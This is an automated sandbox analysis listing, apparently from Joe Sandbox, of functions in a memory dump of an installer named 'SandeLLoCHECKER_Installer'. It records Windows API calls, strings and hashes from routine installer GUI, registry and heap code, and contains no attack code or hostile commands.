                                                                                                                        • Opcode ID: 15eb5c6abac51fff40137602ea3b44a2afb72497d976b5546d9c18dbced40d1a
                                                                                                                        • Instruction ID: f92a6dd29f12606a75452499156c1ebc42ee1282b4a190b494b05d47af55ebb9
                                                                                                                        • Opcode Fuzzy Hash: 15eb5c6abac51fff40137602ea3b44a2afb72497d976b5546d9c18dbced40d1a
                                                                                                                        • Instruction Fuzzy Hash: 96E10771D01219AFDB21CFA8C944BAEBBF8FF09710F254269E809E7251DB706A45CF51
                                                                                                                        Function 0093F260 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74libraryloaderwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0093F2F0
                                                                                                                          • Part of subcall function 00A16258: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16262
                                                                                                                          • Part of subcall function 00A16258: LeaveCriticalSection.KERNEL32(00B2FE4C,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16295
                                                                                                                          • Part of subcall function 00A16258: RtlWakeAllConditionVariable.NTDLL ref: 00A1630C
                                                                                                                        • GetProcAddress.KERNEL32(SetWindowTheme), ref: 0093F32D
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0093F344
                                                                                                                        • SendMessageW.USER32(000000EF,00001036,00010000,00010000), ref: 0093F36F
                                                                                                                          • Part of subcall function 00A162A2: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A162AD
                                                                                                                          • Part of subcall function 00A162A2: LeaveCriticalSection.KERNEL32(00B2FE4C,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A162EA
                                                                                                                          • Part of subcall function 0091D900: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 0091D941
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterInit_thread_footerLeave$AddressConditionDirectoryMessageProcSendSystemVariableWake
                                                                                                                        • String ID: SetWindowTheme$UxTheme.dll$explorer
                                                                                                                        • API String ID: 3410024541-3123591815
                                                                                                                        • Opcode ID: 4b38a4faa2e6c0f73842c2cafedc28109f7739c364e5e2c05f138cddd9c6276a
                                                                                                                        • Instruction ID: 88669d7367ee2f9dd1ca49508a35aa7c0fab2d15d19592134aba0e4b9ced6a9f
                                                                                                                        • Opcode Fuzzy Hash: 4b38a4faa2e6c0f73842c2cafedc28109f7739c364e5e2c05f138cddd9c6276a
                                                                                                                        • Instruction Fuzzy Hash: F8218071A80600FBCB21DF54DD13B8EF7A8EB15B20F208225E924D72E1EBB5A9408F51
                                                                                                                        Function 0093F030 Relevance: 12.2, APIs: 8, Instructions: 155windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001036,00010000,00000000), ref: 0093F09B
                                                                                                                        • GetParent.USER32(00000000), ref: 0093F0EE
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 0093F0F1
                                                                                                                        • GetParent.USER32(00000000), ref: 0093F100
                                                                                                                        • GetDC.USER32(00000000), ref: 0093F103
                                                                                                                          • Part of subcall function 008F8E20: GetWindowRect.USER32(?,?), ref: 008F8EB2
                                                                                                                          • Part of subcall function 008F8E20: GetWindowRect.USER32(?,?), ref: 008F8ECA
                                                                                                                        • DeleteDC.GDI32(?), ref: 0093F1CC
                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,000000FF), ref: 0093F1F0
                                                                                                                        • SendMessageW.USER32(?,0000108A,00000000,00000011), ref: 0093F203
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageRectSendWindow$Parent$Delete
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3294981445-0
                                                                                                                        • Opcode ID: b59875d7eddb577bb8e4261e1d26bc18fa73ada8190c19fa0f7f7c9649a1a207
                                                                                                                        • Instruction ID: 6cb265b0d5bd92ced01a5020f167020f9a5885cb6659d70dea6b5102e9815eac
                                                                                                                        • Opcode Fuzzy Hash: b59875d7eddb577bb8e4261e1d26bc18fa73ada8190c19fa0f7f7c9649a1a207
                                                                                                                        • Instruction Fuzzy Hash: 2F513B71D00649ABDB21DFA8CD45BEEBBF8EF59710F10432AE815A7291EB706981CB50
                                                                                                                        Function 008608C0 Relevance: 12.1, APIs: 8, Instructions: 138COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 008608EA
                                                                                                                        • GetWindow.USER32(?,00000005), ref: 008608F7
                                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 00860A32
                                                                                                                          • Part of subcall function 00860740: GetWindowRect.USER32(?,?), ref: 0086076C
                                                                                                                          • Part of subcall function 00860740: GetWindowRect.USER32(?,?), ref: 0086077C
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0086098B
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0086099B
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 008609B5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Rect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3200805268-0
                                                                                                                        • Opcode ID: fe17241d51a167f3a572a68278d17129317909f45c1300c724fda4f964eb7a3d
                                                                                                                        • Instruction ID: 59d4c96a6ef723f9a5de68ef33fd14ec15273b47cd864dc7109eed01b6263fa6
                                                                                                                        • Opcode Fuzzy Hash: fe17241d51a167f3a572a68278d17129317909f45c1300c724fda4f964eb7a3d
                                                                                                                        • Instruction Fuzzy Hash: 8741A8315087019BC721DB29C980E6BFBEAFF96704F554A2DF085C3521EB30E988CB52
                                                                                                                        Function 00A157E1 Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A15805
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A1580C
                                                                                                                          • Part of subcall function 00A158D7: IsProcessorFeaturePresent.KERNEL32(0000000C,00A157F3,00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A158D9
                                                                                                                        • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A1581C
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00A1598B,?,?,?,?,?,?,?), ref: 00A15843
                                                                                                                        • RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A15857
                                                                                                                        • InterlockedPopEntrySList.KERNEL32(00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A1586A
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A1587D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2460949444-0
                                                                                                                        • Opcode ID: a1b7fef9519f2df2a711ebb60fc03022808597c182037995dbeeb5f246281cf3
                                                                                                                        • Instruction ID: 8589b61c7127e17281f4e9e559686aa49a2610b6dcbaecdbc745c128214e8d4e
                                                                                                                        • Opcode Fuzzy Hash: a1b7fef9519f2df2a711ebb60fc03022808597c182037995dbeeb5f246281cf3
                                                                                                                        • Instruction Fuzzy Hash: 52119075F01A12EFD7219BB8DD48FE6766DEB84781F240431F902E6251DE60DC42A7A0
                                                                                                                        Function 00964070 Relevance: 10.9, APIs: 7, Instructions: 414fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,C7BA013E), ref: 009641B9
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00001000,?,00000000,00001000), ref: 0096422B
                                                                                                                        • ReadFile.KERNEL32(?,00000000,00001000,00000000,00000000,?,?,00000000), ref: 009644CC
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0096452A
                                                                                                                          • Part of subcall function 00964070: LoadStringW.USER32(000000A1,?,00000514,C7BA013E), ref: 00963FD6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Init_thread_footerRead$CloseCreateHandleHeapLoadProcessString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1714711150-0
                                                                                                                        • Opcode ID: 46a2cace4567d44e8fb53c0c0036cdeb24037f835d80b69de3dcea9becb74093
                                                                                                                        • Instruction ID: 9a15b35ac4aec85adc25f2301678716c42d0c24e87207609d7e94dec356eef67
                                                                                                                        • Opcode Fuzzy Hash: 46a2cace4567d44e8fb53c0c0036cdeb24037f835d80b69de3dcea9becb74093
                                                                                                                        • Instruction Fuzzy Hash: EEF19F71E00308DBDF10DFA8C949BAEBBB9FF45714F24821DE415AB291DB74AA44CB91
                                                                                                                        Function 009117C0 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 342COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00911A65
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,00B36A24,00000000), ref: 00911A9C
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00911B31
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer$InfoParametersSystem
                                                                                                                        • String ID: AI_FRAME_NO_CAPTION_$Dialog$`Dialog` = '
                                                                                                                        • API String ID: 3910108132-2270296660
                                                                                                                        • Opcode ID: ab9075fa6a8306dca4b48a4bba5a4f95e281e7fb039604146226e4eefc11c158
                                                                                                                        • Instruction ID: 6af0b7656493e34e167b9c4ed0d862205098d643e1d5d35be711543e66a2e580
                                                                                                                        • Opcode Fuzzy Hash: ab9075fa6a8306dca4b48a4bba5a4f95e281e7fb039604146226e4eefc11c158
                                                                                                                        • Instruction Fuzzy Hash: 67D1AC71A10608EFCB14CF78DD85B9EBBB5FF58310F24C22AE915A7291DB70A944CB91
                                                                                                                        Function 0085DB80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 285registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,Caphyon.AI.ExtUI.IEClickSoundRemover,C7BA013E), ref: 0085DC21
                                                                                                                        • GetLastError.KERNEL32 ref: 0085DC4A
                                                                                                                        • RegCloseKey.ADVAPI32(?,00AAA29C,00000000,00AAA29C,00000000,?,80000001,00000001,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033), ref: 0085DEBE
                                                                                                                        • CloseHandle.KERNEL32(?,C7BA013E,?,?,00000000,00A4297D,000000FF,?,00AAA29C,00000000,00AAA29C,00000000,?,80000001,00000001,00000000), ref: 0085DF4E
                                                                                                                        Strings
                                                                                                                        • Caphyon.AI.ExtUI.IEClickSoundRemover, xrefs: 0085DC16
                                                                                                                        • AppEvents\Schemes\Apps\Explorer\Navigating\.Current, xrefs: 0085DC82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$CreateErrorEventHandleLast
                                                                                                                        • String ID: AppEvents\Schemes\Apps\Explorer\Navigating\.Current$Caphyon.AI.ExtUI.IEClickSoundRemover
                                                                                                                        • API String ID: 1253123496-2079760225
                                                                                                                        • Opcode ID: b8680bf1782f81469a8de5261fe22172b7ed8bcaf10c6c2839914bc550580391
                                                                                                                        • Instruction ID: 36dd54a0eaa11fe03a37011b279d9b3f4c916c985d9c548e66d0c6f25a07cc2b
                                                                                                                        • Opcode Fuzzy Hash: b8680bf1782f81469a8de5261fe22172b7ed8bcaf10c6c2839914bc550580391
                                                                                                                        • Instruction Fuzzy Hash: FAC1AD70D00348DFDB24CF68C949BAEBBB5FF55301F14829DE859A7281DB746A88CB51
                                                                                                                        Function 0085BD00 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 269COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(00B314EC,C7BA013E,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00A42275), ref: 0085BD6A
                                                                                                                        • GetModuleFileNameW.KERNEL32(0000FFFF,00000104,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00A42275), ref: 0085BDEA
                                                                                                                        • EnterCriticalSection.KERNEL32(00B31508,?,?,?,?,?,?,?,?,?,?,?,00000000,00A42275,000000FF), ref: 0085BFA3
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B31508,?,?,?,?,?,?,?,?,?,?,00000000,00A42275,000000FF), ref: 0085BFC4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Enter$FileLeaveModuleName
                                                                                                                        • String ID: v
                                                                                                                        • API String ID: 1807155316-3261393531
                                                                                                                        • Opcode ID: a2c87af7267a4a98dee2888d6ea4155cc2f41d85038a94aa145d1cad7df360a6
                                                                                                                        • Instruction ID: 31ac6b062201dc698455b47bdafe665d283a3e388db842ac15df0fdf9ed9615c
                                                                                                                        • Opcode Fuzzy Hash: a2c87af7267a4a98dee2888d6ea4155cc2f41d85038a94aa145d1cad7df360a6
                                                                                                                        • Instruction Fuzzy Hash: 0EB15E70A00249DFDB11CFA4D848BAEBBB4FF18315F244559E804EB291DB75AD49CFA0
                                                                                                                        Function 0095E1D0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 249registrylibraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,C7BA013E), ref: 0095E414
                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 0095E424
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0095E46D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressCloseHandleModuleProc
                                                                                                                        • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                                                                        • API String ID: 4190037839-3913318428
                                                                                                                        • Opcode ID: f79f6e7c74437613eb29da2dd70eb82f15da75bcde78dc5df38e9424994242d0
                                                                                                                        • Instruction ID: 7b562843f110ccab68a6e4e360e73466476d871ae5156dbeb17d4a243cddeaf0
                                                                                                                        • Opcode Fuzzy Hash: f79f6e7c74437613eb29da2dd70eb82f15da75bcde78dc5df38e9424994242d0
                                                                                                                        • Instruction Fuzzy Hash: 92A16AB0D00308DFDB14DFA9C949B9EBBB9FF44300F148569E815EB291DB75AA48CB91
                                                                                                                        Function 00857B90 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 194comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.COMBASE(00AAC5A4,00000000,00000001,00AACC2C,?), ref: 00857C60
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInstance
                                                                                                                        • String ID: :${
                                                                                                                        • API String ID: 542301482-3766677574
                                                                                                                        • Opcode ID: 7c1ae00fa62a3c83a8e76462f6a379da3b5a36fa46ebe87aa9e7f69ab9573f39
                                                                                                                        • Instruction ID: 755a4ff5cc08d2ee83882cf3fdce97403852f8e2595f609ff5bc660221622281
                                                                                                                        • Opcode Fuzzy Hash: 7c1ae00fa62a3c83a8e76462f6a379da3b5a36fa46ebe87aa9e7f69ab9573f39
                                                                                                                        • Instruction Fuzzy Hash: 2561AF74A042169FDF249F649844BBEB7F5FF09722F148469EC01EB280EB759C858760
                                                                                                                        Function 00962070 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32 ref: 009621F7
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00962213
                                                                                                                        • GetExitCodeProcess.KERNEL32(00000000,00A7F697), ref: 00962224
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00962232
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
                                                                                                                        • String ID: <$open
                                                                                                                        • API String ID: 2321548817-1930408713
                                                                                                                        • Opcode ID: a141e5d35109aa47a11d132ee4f3f02c6e0cdfe03b9e5a97265921f5606241be
                                                                                                                        • Instruction ID: 54ae327700599c11a077a2a38c5381e87ec502157f515967ec5a69d3c64360c6
                                                                                                                        • Opcode Fuzzy Hash: a141e5d35109aa47a11d132ee4f3f02c6e0cdfe03b9e5a97265921f5606241be
                                                                                                                        • Instruction Fuzzy Hash: ED617C71E046499FDB10CFA8C85879EBBB8FF49324F148269E825AB3D1DB749D01CB90
                                                                                                                        Function 00859360 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 157COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(00B3683C,C7BA013E,00000000,00B36858), ref: 008593D3
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B3683C), ref: 00859438
                                                                                                                        • LoadCursorW.USER32(00840000,?), ref: 00859494
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B3683C), ref: 0085952B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
